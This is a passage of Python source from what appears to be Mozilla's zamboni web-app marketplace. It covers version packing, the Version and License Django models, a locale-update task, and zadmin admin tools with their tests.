    if match:
        d = match.groupdict()
        for letter in letters:
            d[letter] = d[letter] if d[letter] else None
        # Loop variable renamed from `num`, which shadowed the module-level
        # num() helper defined above.
        for key in numbers:
            if d[key] == '*':
                d[key] = 99
            else:
                d[key] = int(d[key]) if d[key] else None
    else:
        d = dict((k, None) for k in numbers)
        d.update((k, None) for k in letters)
    return d
def version_int(version):
    """Pack a version string into a single sortable integer.

    Fields are concatenated as fixed-width decimal digits; the result is
    capped at MAXVERSION so it fits in a MySQL BIGINT.
    """
    parts = version_dict(smart_str(version))
    # Missing numeric fields count as zero.
    for key in ('alpha_ver', 'major', 'minor1', 'minor2', 'minor3',
                'pre_ver'):
        parts[key] = parts[key] or 0
    # alpha: 'a' -> 0, 'b' -> 1, absent -> 2; pre flag: present -> 0.
    parts['alpha'] = {'a': 0, 'b': 1}.get(parts['alpha'], 2)
    parts['pre'] = 0 if parts['pre'] else 1
    packed = "%d%02d%02d%02d%d%02d%d%02d" % (
        parts['major'], parts['minor1'], parts['minor2'], parts['minor3'],
        parts['alpha'], parts['alpha_ver'], parts['pre'], parts['pre_ver'])
    return min(int(packed), MAXVERSION)
########NEW FILE########
__FILENAME__ = models
# -*- coding: utf-8 -*-
import datetime
import json
import os
import django.dispatch
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.core.files.storage import default_storage as storage
from django.db import models
import caching.base
import commonware.log
import jinja2
import addons.query
import amo
import amo.models
import amo.utils
from amo.decorators import use_master
from amo.urlresolvers import reverse
from applications.models import Application, AppVersion
from files import utils
from files.models import cleanup_file, File, Platform
from translations.fields import (LinkifiedField, PurifiedField, save_signal,
TranslatedField)
from versions.tasks import update_supported_locales_single
from .compare import version_dict, version_int
log = commonware.log.getLogger('z.versions')
class VersionManager(amo.models.ManagerBase):
    """Default manager for Version.

    Soft-deleted rows are hidden unless constructed with
    include_deleted=True (see Version.with_deleted).
    """

    def __init__(self, include_deleted=False):
        amo.models.ManagerBase.__init__(self)
        self.include_deleted = include_deleted

    def get_query_set(self):
        """Base queryset with the eager-loading transformer attached."""
        queryset = super(VersionManager, self).get_query_set()
        queryset = queryset._clone(klass=addons.query.IndexQuerySet)
        if not self.include_deleted:
            queryset = queryset.exclude(deleted=True)
        return queryset.transform(Version.transformer)
class Version(amo.models.ModelBase):
    """A single uploaded version of an add-on/webapp and its files.

    Soft-deletable: `objects` hides deleted rows; `with_deleted` includes
    them.  `version_int` stores the packed sortable form of `version`.
    """
    addon = models.ForeignKey('addons.Addon', related_name='versions')
    license = models.ForeignKey('License', null=True)
    releasenotes = PurifiedField()
    approvalnotes = models.TextField(default='', null=True)
    version = models.CharField(max_length=255, default='0.1')
    # Packed, sortable form of `version` (see compare.version_int).
    version_int = models.BigIntegerField(null=True, editable=False)
    nomination = models.DateTimeField(null=True)
    reviewed = models.DateTimeField(null=True)
    has_info_request = models.BooleanField(default=False)
    has_editor_comment = models.BooleanField(default=False)
    deleted = models.BooleanField(default=False)
    supported_locales = models.CharField(max_length=255)
    _developer_name = models.CharField(max_length=255, default='',
                                       editable=False)

    objects = VersionManager()
    with_deleted = VersionManager(include_deleted=True)

    class Meta(amo.models.ModelBase.Meta):
        db_table = 'versions'
        ordering = ['-created', '-modified']

    def __init__(self, *args, **kwargs):
        super(Version, self).__init__(*args, **kwargs)
        # Expose major/minor1/... attributes parsed from the version string.
        self.__dict__.update(version_dict(self.version or ''))

    def __unicode__(self):
        return jinja2.escape(self.version)

    def save(self, *args, **kw):
        if not self.version_int and self.version:
            v_int = version_int(self.version)
            # Magic number warning, this is the maximum size
            # of a big int in MySQL to prevent version_int overflow, for
            # people who have rather crazy version numbers.
            # http://dev.mysql.com/doc/refman/5.5/en/numeric-types.html
            if v_int < 9223372036854775807:
                self.version_int = v_int
            else:
                log.error('No version_int written for version %s, %s' %
                          (self.pk, self.version))
        creating = not self.id
        super(Version, self).save(*args, **kw)
        if creating:
            # To avoid circular import.
            from mkt.webapps.models import AppFeatures
            AppFeatures.objects.create(version=self)
        return self

    @classmethod
    def from_upload(cls, upload, addon, platforms, send_signal=True):
        """Create a Version (plus files, manifest, compat rows) from a
        FileUpload."""
        data = utils.parse_addon(upload, addon)
        try:
            license = addon.versions.latest().license_id
        except Version.DoesNotExist:
            license = None
        max_len = cls._meta.get_field_by_name('_developer_name')[0].max_length
        developer = data.get('developer_name', '')[:max_len]
        v = cls.objects.create(addon=addon, version=data['version'],
                               license_id=license, _developer_name=developer)
        log.info('New version: %r (%s) from %r' % (v, v.id, upload))
        AV = ApplicationsVersions
        for app in data.get('apps', []):
            AV(version=v, min=app.min, max=app.max,
               application_id=app.id).save()
        # NOTE(review): the `platforms` argument is discarded here -- apps
        # always get PLATFORM_ALL.  Confirm callers don't rely on it.
        platforms = [Platform.objects.get(id=amo.PLATFORM_ALL.id)]
        # To avoid circular import.
        from mkt.webapps.models import AppManifest
        # Note: This must happen before we call `File.from_upload`.
        manifest = utils.WebAppParser().get_json_data(upload)
        AppManifest.objects.create(
            version=v, manifest=json.dumps(manifest))
        for platform in platforms:
            File.from_upload(upload, v, platform, parse_data=data)
        # Update supported locales from manifest.
        # Note: This needs to happen after we call `File.from_upload`.
        update_supported_locales_single.apply_async(
            args=[addon.id], kwargs={'latest': True},
            eta=datetime.datetime.now() +
                datetime.timedelta(seconds=settings.NFS_LAG_DELAY))
        v.disable_old_files()
        # After the upload has been copied to all platforms, remove the upload.
        storage.delete(upload.path)
        if send_signal:
            version_uploaded.send(sender=v)
        # If packaged app and app is blocked, put in escalation queue.
        if addon.is_packaged and addon.status == amo.STATUS_BLOCKED:
            # To avoid circular import.
            from editors.models import EscalationQueue
            EscalationQueue.objects.create(addon=addon)
        return v

    @property
    def path_prefix(self):
        return os.path.join(settings.ADDONS_PATH, str(self.addon_id))

    def license_url(self, impala=False):
        return reverse('addons.license', args=[self.addon.slug, self.version])

    def flush_urls(self):
        return self.addon.flush_urls()

    def delete(self):
        """Soft-delete: flag the row and disable/unlink its files."""
        log.info(u'Version deleted: %r (%s)' % (self, self.id))
        amo.log(amo.LOG.DELETE_VERSION, self.addon, str(self.version))
        self.update(deleted=True)
        # Set file status to disabled.
        f = self.all_files[0]
        f.update(status=amo.STATUS_DISABLED, _signal=False)
        f.hide_disabled_file()
        if self.addon.is_packaged:
            # Unlink signed packages if packaged app.
            storage.delete(f.signed_file_path)
            log.info(u'Unlinked file: %s' % f.signed_file_path)
            storage.delete(f.signed_reviewer_file_path)
            log.info(u'Unlinked file: %s' % f.signed_reviewer_file_path)

    @amo.cached_property(writable=True)
    def all_activity(self):
        from devhub.models import VersionLog  # yucky
        al = (VersionLog.objects.filter(version=self.id).order_by('created')
              .select_related(depth=1).no_cache())
        return al

    @amo.cached_property(writable=True)
    def compatible_apps(self):
        """Get a mapping of {APP: ApplicationVersion}."""
        avs = self.apps.select_related(depth=1)
        return self._compat_map(avs)

    @amo.cached_property(writable=True)
    def all_files(self):
        """Shortcut for list(self.files.all()). Heavily cached."""
        return list(self.files.all())

    @amo.cached_property
    def supported_platforms(self):
        """Get a list of supported platform names."""
        return list(set(amo.PLATFORMS[f.platform_id] for f in self.all_files))

    @property
    def status(self):
        status_choices = amo.MKT_STATUS_FILE_CHOICES
        if self.deleted:
            return [status_choices[amo.STATUS_DELETED]]
        else:
            return [status_choices[f.status] for f in self.all_files]

    @property
    def statuses(self):
        """Unadulterated statuses, good for an API."""
        return [(f.id, f.status) for f in self.all_files]

    def is_public(self):
        # To be public, a version must not be deleted, must belong to a public
        # addon, and all its attached files must have public status.
        try:
            return (not self.deleted and self.addon.is_public() and
                    all(f.status == amo.STATUS_PUBLIC for f in self.all_files))
        except ObjectDoesNotExist:
            return False

    @property
    def has_files(self):
        return bool(self.all_files)

    @classmethod
    def _compat_map(cls, avs):
        # Build {APP object: ApplicationsVersions row}, skipping unknown apps.
        apps = {}
        for av in avs:
            app_id = av.application_id
            if app_id in amo.APP_IDS:
                apps[amo.APP_IDS[app_id]] = av
        return apps

    @classmethod
    def transformer(cls, versions):
        """Attach all the compatible apps and files to the versions."""
        ids = set(v.id for v in versions)
        if not versions:
            return
        # FIXME: find out why we have no_cache() here and try to remove it.
        avs = (ApplicationsVersions.objects.filter(version__in=ids)
               .select_related(depth=1).no_cache())
        files = File.objects.filter(version__in=ids).no_cache()

        def rollup(xs):
            groups = amo.utils.sorted_groupby(xs, 'version_id')
            return dict((k, list(vs)) for k, vs in groups)

        av_dict, file_dict = rollup(avs), rollup(files)
        for version in versions:
            v_id = version.id
            version.compatible_apps = cls._compat_map(av_dict.get(v_id, []))
            version.all_files = file_dict.get(v_id, [])
            for f in version.all_files:
                f.version = version

    @classmethod
    def transformer_activity(cls, versions):
        """Attach all the activity to the versions."""
        from devhub.models import VersionLog  # yucky
        ids = set(v.id for v in versions)
        if not versions:
            return
        al = (VersionLog.objects.filter(version__in=ids).order_by('created')
              .select_related(depth=1).no_cache())

        def rollup(xs):
            groups = amo.utils.sorted_groupby(xs, 'version_id')
            return dict((k, list(vs)) for k, vs in groups)

        al_dict = rollup(al)
        for version in versions:
            v_id = version.id
            version.all_activity = al_dict.get(v_id, [])

    def disable_old_files(self):
        # Skip when a beta file exists; otherwise disable unreviewed/pending
        # files on all older versions of the same addon.
        if not self.files.filter(status=amo.STATUS_BETA).exists():
            qs = File.objects.filter(version__addon=self.addon_id,
                                     version__lt=self.id,
                                     version__deleted=False,
                                     status__in=[amo.STATUS_UNREVIEWED,
                                                 amo.STATUS_PENDING])
            # Use File.update so signals are triggered.
            for f in qs:
                f.update(status=amo.STATUS_DISABLED)

    @property
    def developer_name(self):
        return self._developer_name

    @amo.cached_property(writable=True)
    def is_privileged(self):
        """
        Return whether the corresponding addon is privileged by looking at
        the manifest file.
        This is a cached property, to avoid going in the manifest more than
        once for a given instance. It's also directly writable to allow you to
        bypass the manifest fetching if you *know* your app is privileged or
        not already and want to pass the instance to some code that will use
        that property.
        """
        if not self.addon.is_packaged or not self.all_files:
            return False
        data = self.addon.get_manifest_json(file_obj=self.all_files[0])
        return data.get('type') == 'privileged'

    @amo.cached_property
    def manifest(self):
        """The stored app manifest as a dict ({} when missing)."""
        # To avoid circular import.
        from mkt.webapps.models import AppManifest
        try:
            manifest = self.manifest_json.manifest
        except AppManifest.DoesNotExist:
            manifest = None
        return json.loads(manifest) if manifest else {}
@use_master
def update_status(sender, instance, **kw):
    """post_save/post_delete handler: refresh the addon's cached status.

    Skipped for raw (fixture-loading) saves.  The addon may already be
    gone when the last version disappears, hence the ObjectDoesNotExist
    guard.
    """
    if not kw.get('raw'):
        try:
            instance.addon.reload()
            instance.addon.update_status()
            instance.addon.update_version()
        except models.ObjectDoesNotExist:
            # Addon can legitimately be missing (cascade delete); log and
            # carry on.  (Removed a redundant `pass` after the log call.)
            log.info('Got ObjectDoesNotExist processing Version change signal',
                     exc_info=True)
def inherit_nomination(sender, instance, **kw):
    """Inherit nomination date for new packaged app versions."""
    if kw.get('raw'):
        # Fixture loads: leave nomination dates untouched.
        return
    addon = instance.addon
    if addon.is_packaged:
        # If prior version's file is pending, inherit nomination. Otherwise,
        # set nomination to now.
        last_ver = (Version.objects.filter(addon=addon)
                    .exclude(pk=instance.pk)
                    .order_by('-nomination'))
        if (last_ver.exists() and
                last_ver[0].all_files[0].status == amo.STATUS_PENDING):
            # _signal=False avoids re-triggering this post_save handler.
            instance.update(nomination=last_ver[0].nomination, _signal=False)
            log.debug('[Webapp:%s] Inheriting nomination from prior pending '
                      'version' % addon.id)
        elif (addon.status in amo.WEBAPPS_APPROVED_STATUSES and
              not instance.nomination):
            log.debug('[Webapp:%s] Setting nomination date to now for new '
                      'version.' % addon.id)
            instance.update(nomination=datetime.datetime.now(), _signal=False)
def cleanup_version(sender, instance, **kw):
    """pre_delete handler: run per-file cleanup for every attached file.

    Skipped on raw (fixture) operations.
    """
    if kw.get('raw'):
        return
    for attached in instance.files.all():
        cleanup_file(attached.__class__, attached)
# Fired by Version.from_upload() once a new version's files are in place.
version_uploaded = django.dispatch.Signal()

# Keep translations, addon status and nomination dates in sync with the
# version lifecycle.  dispatch_uids guard against duplicate registration
# when this module is imported more than once.
models.signals.pre_save.connect(
    save_signal, sender=Version, dispatch_uid='version_translations')
models.signals.post_save.connect(
    update_status, sender=Version, dispatch_uid='version_update_status')
models.signals.post_save.connect(
    inherit_nomination, sender=Version,
    dispatch_uid='version_inherit_nomination')
models.signals.post_delete.connect(
    update_status, sender=Version, dispatch_uid='version_update_status')
models.signals.pre_delete.connect(
    cleanup_version, sender=Version, dispatch_uid='cleanup_version')
class LicenseManager(amo.models.ManagerBase):
    """Manager helpers for License."""

    def builtins(self):
        """Bundled licenses (builtin > 0), in builtin-id order."""
        return self.filter(builtin__gt=0).order_by('builtin')
class License(amo.models.ModelBase):
    """A software license a version can be released under."""
    # `builtin` value marking a custom (non-bundled) license.
    OTHER = 0

    name = TranslatedField(db_column='name')
    url = models.URLField(null=True)
    builtin = models.PositiveIntegerField(default=OTHER)
    text = LinkifiedField()
    on_form = models.BooleanField(default=False,
        help_text='Is this a license choice in the devhub?')
    some_rights = models.BooleanField(default=False,
        help_text='Show "Some Rights Reserved" instead of the license name?')
    icons = models.CharField(max_length=255, null=True,
        help_text='Space-separated list of icon identifiers.')

    objects = LicenseManager()

    class Meta:
        db_table = 'licenses'

    def __unicode__(self):
        return unicode(self.name)
# Sync translated fields before saving.  The dispatch_uid matches Version's
# hook, but uids are scoped per sender, so both connections fire.
models.signals.pre_save.connect(
    save_signal, sender=License, dispatch_uid='version_translations')
class ApplicationsVersions(caching.base.CachingMixin, models.Model):
    """Compatibility range (min/max AppVersion) of a Version per application."""
    application = models.ForeignKey(Application)
    version = models.ForeignKey(Version, related_name='apps')
    min = models.ForeignKey(AppVersion, db_column='min',
                            related_name='min_set')
    max = models.ForeignKey(AppVersion, db_column='max',
                            related_name='max_set')

    objects = caching.base.CachingManager()

    class Meta:
        db_table = u'applications_versions'
        # One compatibility row per (application, version) pair.
        unique_together = (('application', 'version'),)

    def __unicode__(self):
        return u'%s %s - %s' % (self.application, self.min, self.max)
########NEW FILE########
__FILENAME__ = tasks
import logging
from celeryutils import task
from amo.decorators import write
log = logging.getLogger('z.task')
@task
@write
def update_supported_locales_single(id, latest=False, **kw):
    """
    Update supported_locales for an individual app. Set latest=True to use the
    latest current version instead of the most recent public version.
    """
    from mkt.webapps.models import Webapp

    try:
        app = Webapp.objects.get(pk=id)
    except Webapp.DoesNotExist:
        log.info(u'[Webapp:%s] Did not find webapp to update supported '
                 u'locales.' % id)
        return

    try:
        if app.update_supported_locales(latest=latest):
            log.info(u'[Webapp:%s] Updated supported locales.' % app.id)
    except Exception:
        # Fixed log tag: was u'[Webapp%s]' -- missing the colon used by
        # every other message in this task.
        log.info(u'[Webapp:%s] Updating supported locales failed.' % app.id,
                 exc_info=True)
########NEW FILE########
__FILENAME__ = admin
from django.contrib import admin
from . import models
# Expose sitewide Config and DownloadSource rows in the Django admin.
admin.site.register(models.Config)
# Remove the bulk "delete selected" action from the whole admin site.
admin.site.disable_action('delete_selected')
admin.site.register(models.DownloadSource)
########NEW FILE########
__FILENAME__ = decorators
import functools
from django.core.exceptions import PermissionDenied
from access.acl import action_allowed
from amo.decorators import login_required
def admin_required(reviewers=False):
    """
    Admin, or someone with AdminTools:View, required.

    If reviewers=True ReviewerAdminTools:View is allowed also.

    Works both bare (@admin_required) and called
    (@admin_required(reviewers=True)).
    """
    def decorator(f):
        @login_required
        @functools.wraps(f)
        def wrapper(request, *args, **kw):
            admin = (action_allowed(request, 'Admin', '%') or
                     action_allowed(request, 'AdminTools', 'View'))
            # `is True` rather than `== True`: in the paren-less form
            # `reviewers` holds the decorated function and must never
            # widen access.
            if reviewers is True:
                admin = (
                    admin or
                    action_allowed(request, 'ReviewerAdminTools', 'View'))
            if admin:
                return f(request, *args, **kw)
            raise PermissionDenied
        return wrapper
    # If decorator has no args, and is "paren-less", it's callable.
    if callable(reviewers):
        return decorator(reviewers)
    else:
        return decorator
########NEW FILE########
__FILENAME__ = forms
from django import forms
from django.conf import settings
from django.forms import ModelForm
from django.forms.models import modelformset_factory
import commonware.log
import happyforms
from quieter_formset.formset import BaseModelFormSet
from addons.models import Addon
from files.models import File
LOGGER_NAME = 'z.zadmin'
log = commonware.log.getLogger(LOGGER_NAME)
class DevMailerForm(happyforms.Form):
    """Admin form for bulk-mailing cohorts of developers."""
    # (value, human label) pairs for the recipient-cohort dropdown.
    _choices = [('eula',
                 'Developers who have set up EULAs for active add-ons'),
                ('sdk', 'Developers of active SDK add-ons'),
                ('apps', 'Developers of active apps (not add-ons)'),
                ('free_apps_region_enabled',
                 'Developers of free apps and new region enabled'),
                ('free_apps_region_disabled',
                 'Developers of free apps with new regions disabled'),
                ('payments',
                 'Developers of non-deleted apps (not add-ons) with payments'),
                ('payments_region_enabled',
                 'Developers of apps with payments and new regions enabled'),
                ('payments_region_disabled',
                 'Developers of apps with payments and new regions disabled'),
                ('desktop_apps',
                 'Developers of non-deleted apps supported on desktop'),
                ('all_extensions', 'All extension developers')]
    recipients = forms.ChoiceField(choices=_choices, required=True)
    subject = forms.CharField(widget=forms.TextInput(attrs=dict(size='100')),
                              required=True)
    # When checked, mails are logged via EmailPreviewTopic instead of sent.
    preview_only = forms.BooleanField(initial=True, required=False,
                                      label=u'Log emails instead of sending')
    message = forms.CharField(widget=forms.Textarea, required=True)
class AddonStatusForm(ModelForm):
    """Edit an addon's status fields from the zadmin manage page."""
    class Meta:
        model = Addon
        fields = ('status', 'highest_status', 'outstanding')
class FileStatusForm(ModelForm):
    """Edit a single file's status from the zadmin manage page."""
    class Meta:
        model = File
        fields = ('status',)


# Formset over an addon's existing files; extra=0 means no blank forms.
FileFormSet = modelformset_factory(File, form=FileStatusForm,
                                   formset=BaseModelFormSet, extra=0)
class YesImSure(happyforms.Form):
    """Confirmation checkbox used by destructive admin actions."""
    yes = forms.BooleanField(required=True, label="Yes, I'm sure")
class GenerateErrorForm(happyforms.Form):
    """Admin tool: deliberately raise errors / emit log messages so the
    monitoring pipelines (error email, Heka, CEF, Sentry) can be verified
    end to end."""
    error = forms.ChoiceField(choices=(
        ['zerodivisionerror', 'Zero Division Error (will email)'],
        ['iorequesterror', 'IORequest Error (no email)'],
        ['heka_statsd', 'Heka statsd message'],
        ['heka_json', 'Heka JSON message'],
        ['heka_cef', 'Heka CEF message'],
        ['heka_sentry', 'Heka Sentry message'],
        ['amo_cef', 'AMO CEF message'],
    ))

    def explode(self):
        """Trigger the error selected in cleaned_data."""
        error = self.cleaned_data.get('error')

        if error == 'zerodivisionerror':
            1 / 0
        elif error == 'iorequesterror':
            # Intentionally shadows the builtin IOError: the raised type is
            # a local class, exercised as the "no email" error path.
            class IOError(Exception):
                pass
            raise IOError('request data read error')
        elif error == 'heka_cef':
            environ = {'REMOTE_ADDR': '127.0.0.1', 'HTTP_HOST': '127.0.0.1',
                       'PATH_INFO': '/', 'REQUEST_METHOD': 'GET',
                       'HTTP_USER_AGENT': 'MySuperBrowser'}
            config = {'cef.version': '0',
                      'cef.vendor': 'Mozilla',
                      'cef.device_version': '3',
                      'cef.product': 'zamboni',
                      'cef': True}
            settings.HEKA.cef('xx\nx|xx\rx', 5, environ, config,
                              username='me', ext1='ok=ok', ext2='ok\\ok',
                              logger_info='settings.HEKA')
        elif error == 'heka_statsd':
            settings.HEKA.incr(name=LOGGER_NAME)
        elif error == 'heka_json':
            settings.HEKA.heka(type="heka_json",
                               fields={'foo': 'bar', 'secret': 42,
                                       'logger_type': 'settings.HEKA'})
        elif error == 'heka_sentry':
            # These are local variables only used
            # by Sentry's frame hacking magic.
            # They won't be referenced which may trigger flake8
            # errors.
            heka_conf = settings.HEKA_CONF  # NOQA
            active_heka_conf = settings.HEKA._config  # NOQA
            try:
                1 / 0
            except:
                # Bare except is intentional: forward whatever was raised.
                settings.HEKA.raven('heka_sentry error triggered')
        elif error == 'amo_cef':
            from amo.utils import log_cef
            env = {'REMOTE_ADDR': '127.0.0.1', 'HTTP_HOST': '127.0.0.1',
                   'PATH_INFO': '/', 'REQUEST_METHOD': 'GET',
                   'HTTP_USER_AGENT': 'MySuperBrowser'}
            log_cef(settings.STATSD_PREFIX, 6, env)
class PriceTiersForm(happyforms.Form):
    """Upload a file of price tiers to import."""
    prices = forms.FileField()
########NEW FILE########
__FILENAME__ = models
import json
from django.conf import settings
from django.db import models
from django.utils.functional import memoize
import amo
import amo.models
_config_cache = {}
class Config(models.Model):
    """Sitewide settings."""
    # Simple key -> text value store.
    key = models.CharField(max_length=255, primary_key=True)
    value = models.TextField()

    class Meta:
        db_table = u'config'

    @property
    def json(self):
        """Value parsed as JSON; {} when missing or malformed."""
        try:
            return json.loads(self.value)
        except (TypeError, ValueError):
            return {}
def unmemoized_get_config(conf):
    """Return the raw value stored under `conf`, or None when absent."""
    try:
        return Config.objects.get(key=conf).value
    except Config.DoesNotExist:
        return None


# Memoized front door; set_config() clears the cache on writes.
get_config = memoize(unmemoized_get_config, _config_cache, 1)
def set_config(conf, value):
    """Create or update a Config row and invalidate the get_config cache."""
    entry, _created = Config.objects.get_or_create(key=conf)
    entry.value = value
    entry.save()
    _config_cache.clear()
class EmailPreviewTopic(object):
    """Store emails in a given topic so an admin can preview before
    re-sending.

    A topic is a unique string identifier that groups together preview
    emails.  If you pass in an object (a Model instance) you will get a
    poor man's foreign key as your topic: EmailPreviewTopic(addon) links
    all preview emails to the ID of that addon object.
    """

    def __init__(self, object=None, suffix='', topic=None):
        if topic:
            self.topic = topic
        else:
            assert object, 'object keyword is required when topic is empty'
            self.topic = '%s-%s-%s' % (object.__class__._meta.db_table,
                                       object.pk, suffix)

    def filter(self, *args, **kw):
        """Query the EmailPreview rows saved under this topic."""
        params = dict(kw)
        params['topic'] = self.topic
        return EmailPreview.objects.filter(**params)

    def send_mail(self, subject, body,
                  from_email=settings.DEFAULT_FROM_EMAIL,
                  recipient_list=tuple([])):
        """Log a mail under this topic instead of sending it."""
        return EmailPreview.objects.create(
            topic=self.topic, subject=subject, body=body,
            recipient_list=u','.join(recipient_list),
            from_email=from_email)
class EmailPreview(amo.models.ModelBase):
    """A log of emails for previewing purposes.

    This is only for development and the data might get deleted at any time.
    """
    topic = models.CharField(max_length=255, db_index=True)
    recipient_list = models.TextField()  # comma separated list of emails
    from_email = models.EmailField()
    subject = models.CharField(max_length=255)
    body = models.TextField()

    class Meta:
        db_table = 'email_preview'
class DownloadSource(models.Model):
    """A recognised origin for download tracking."""
    # e.g., `mkt-search` or `mkt-detail-`.
    name = models.CharField(max_length=255)
    # e.g., `full` or `prefix`.
    type = models.CharField(max_length=255)
    description = models.TextField()
    created = models.DateTimeField(auto_now_add=True)

    class Meta:
        db_table = 'download_sources'

    def __unicode__(self):
        return u'%s (%s)' % (self.name, self.type)
########NEW FILE########
__FILENAME__ = tasks
import logging
from django.conf import settings
from celeryutils import task
from amo.utils import send_mail
from zadmin.models import EmailPreviewTopic
log = logging.getLogger('z.task')
@task(rate_limit='3/s')
def admin_email(all_recipients, subject, body, preview_only=False,
                from_email=settings.DEFAULT_FROM_EMAIL,
                preview_topic='admin_email', **kw):
    """Send an admin mail individually to each recipient.

    With preview_only=True the mails are logged to an EmailPreviewTopic
    instead of being sent.
    """
    log.info('[%s@%s] admin_email about %r'
             % (len(all_recipients), admin_email.rate_limit, subject))
    deliver = (EmailPreviewTopic(topic=preview_topic).send_mail
               if preview_only else send_mail)
    for recipient in all_recipients:
        deliver(subject, body, recipient_list=[recipient],
                from_email=from_email)
########NEW FILE########
__FILENAME__ = test_models
from nose.tools import eq_
from amo.tests import TestCase
from zadmin.models import DownloadSource
class TestDownloadSource(TestCase):
    """DownloadSource rows round-trip and render as 'name (type)'."""

    def test_add(self):
        created = DownloadSource.objects.create(name='home', type='full',
            description='This is obviously for the homepage')
        d = DownloadSource.objects.filter(id=created.id)
        eq_(d.count(), 1)
        eq_(d[0].__unicode__(), 'home (full)')
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
import csv
import json
from cStringIO import StringIO
from django.conf import settings
from django.core import mail, management
from django.core.cache import cache
import mock
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo
import amo.tests
from access.models import Group, GroupUser
from addons.models import Addon
from amo.urlresolvers import reverse
from amo.utils import urlparams
from files.models import File
from users.models import UserProfile
from versions.models import Version
from zadmin.forms import DevMailerForm
from zadmin.models import EmailPreviewTopic
class TestEmailPreview(amo.tests.TestCase):
    """The email-preview CSV export round-trips stored preview mails."""
    fixtures = ['base/addon_3615', 'base/users']

    def setUp(self):
        assert self.client.login(username='admin@mozilla.com',
                                 password='password')
        addon = Addon.objects.get(pk=3615)
        self.topic = EmailPreviewTopic(addon)

    def test_csv(self):
        self.topic.send_mail('the subject', u'Hello Ivan Krsti\u0107',
                             from_email='admin@mozilla.org',
                             recipient_list=['funnyguy@mozilla.org'])
        r = self.client.get(reverse('zadmin.email_preview_csv',
                            args=[self.topic.topic]))
        eq_(r.status_code, 200)
        rdr = csv.reader(StringIO(r.content))
        eq_(rdr.next(), ['from_email', 'recipient_list', 'subject', 'body'])
        # Non-ASCII subject text survives as UTF-8 bytes in the CSV.
        eq_(rdr.next(), ['admin@mozilla.org', 'funnyguy@mozilla.org',
                         'the subject', 'Hello Ivan Krsti\xc4\x87'])
class TestLookup(amo.tests.TestCase):
    """The zadmin user-search JSON endpoint."""
    fixtures = ['base/users']

    def setUp(self):
        assert self.client.login(username='admin@mozilla.com',
                                 password='password')
        self.user = UserProfile.objects.get(pk=999)
        self.url = reverse('zadmin.search', args=['users', 'userprofile'])

    def test_logged_out(self):
        self.client.logout()
        eq_(self.client.get('%s?q=admin' % self.url).status_code, 403)

    def check_results(self, q, expected):
        """Assert the endpoint returns exactly `expected` value/label pairs."""
        res = self.client.get(urlparams(self.url, q=q))
        eq_(res.status_code, 200)
        content = json.loads(res.content)
        eq_(len(content), len(expected))
        ids = [int(c['value']) for c in content]
        emails = [u'%s' % c['label'] for c in content]
        for d in expected:
            id = d['value']
            email = u'%s' % d['label']
            assert id in ids, (
                'Expected user ID "%s" not found' % id)
            assert email in emails, (
                'Expected username "%s" not found' % email)

    def test_lookup_wrong_model(self):
        self.url = reverse('zadmin.search', args=['doesnt', 'exist'])
        res = self.client.get(urlparams(self.url, q=''))
        eq_(res.status_code, 404)

    def test_lookup_empty(self):
        # An empty query returns every user.
        users = UserProfile.objects.values('id', 'email')
        self.check_results('', [dict(
            value=u['id'], label=u['email']) for u in users])

    def test_lookup_by_id(self):
        self.check_results(self.user.id, [dict(value=self.user.id,
                                               label=self.user.email)])

    def test_lookup_by_email(self):
        self.check_results(self.user.email, [dict(value=self.user.id,
                                                  label=self.user.email)])

    def test_lookup_by_username(self):
        self.check_results(self.user.username, [dict(value=self.user.id,
                                                     label=self.user.email)])
class TestAddonSearch(amo.tests.ESTestCase):
    """The zadmin addon-search page (ElasticSearch backed)."""
    fixtures = ['base/users', 'base/addon_3615']

    def setUp(self):
        self.reindex(Addon)
        assert self.client.login(username='admin@mozilla.com',
                                 password='password')
        self.url = reverse('zadmin.addon-search')

    @mock.patch('mkt.webapps.tasks.index_webapps')
    def test_lookup_app(self, index_webapps_mock):
        # Load the Webapp fixture here, as loading it in the
        # TestAddonSearch.fixtures would trigger the reindex, and fail, as
        # this is an AMO test.
        management.call_command('loaddata', 'base/337141-steamcube')
        index_webapps_mock.assert_called()
        res = self.client.get(urlparams(self.url, q='steamcube'))
        eq_(res.status_code, 200)
        links = pq(res.content)('form + h3 + ul li a')
        eq_(len(links), 0)
        # NOTE(review): this guard only executes when `links` is non-empty
        # (never, given the eq_ above), and `li.text().contains(...)` does
        # not look like a valid pyquery/str call -- it would raise if ever
        # reached.  Verify if results reappear.
        if any(li.text().contains('Steamcube') for li in links):
            raise AssertionError('Did not expect webapp in results.')

    def test_lookup_addon(self):
        res = self.client.get(urlparams(self.url, q='delicious'))
        # There's only one result, so it should just forward us to that page.
        eq_(res.status_code, 302)
class TestAddonAdmin(amo.tests.TestCase):
    """The Django admin addon changelist excludes webapps."""
    fixtures = ['base/users', 'base/337141-steamcube', 'base/addon_3615']

    def setUp(self):
        assert self.client.login(username='admin@mozilla.com',
                                 password='password')
        self.url = reverse('admin:addons_addon_changelist')

    def test_no_webapps(self):
        res = self.client.get(self.url)
        doc = pq(res.content)
        rows = doc('#result_list tbody tr')
        # Only the add-on fixture is listed, not the webapp fixture.
        eq_(rows.length, 1)
        eq_(rows.find('a').attr('href'),
            '/en-US/admin/models/addons/addon/3615/')
class TestAddonManagement(amo.tests.TestCase):
    """The zadmin addon-manage view: status edits and hash recalculation."""
    fixtures = ['base/addon_3615', 'base/users']

    def setUp(self):
        self.addon = Addon.objects.get(pk=3615)
        self.url = reverse('zadmin.addon_manage', args=[self.addon.slug])
        self.client.login(username='admin@mozilla.com', password='password')

    def _form_data(self, data=None):
        """Baseline management-form POST data; `data` overrides fields."""
        initial_data = {
            'status': '4',
            'highest_status': '4',
            'outstanding': '0',
            'form-0-status': '4',
            'form-0-id': '67442',
            'form-TOTAL_FORMS': '1',
            'form-INITIAL_FORMS': '1',
        }
        if data:
            initial_data.update(data)
        return initial_data

    def test_addon_status_change(self):
        data = self._form_data({'status': '2'})
        r = self.client.post(self.url, data, follow=True)
        eq_(r.status_code, 200)
        addon = Addon.objects.get(pk=3615)
        eq_(addon.status, 2)

    def test_outstanding_change(self):
        data = self._form_data({'outstanding': '1'})
        r = self.client.post(self.url, data, follow=True)
        eq_(r.status_code, 200)
        addon = Addon.objects.get(pk=3615)
        eq_(addon.outstanding, 1)

    def test_addon_file_status_change(self):
        data = self._form_data({'form-0-status': '2'})
        r = self.client.post(self.url, data, follow=True)
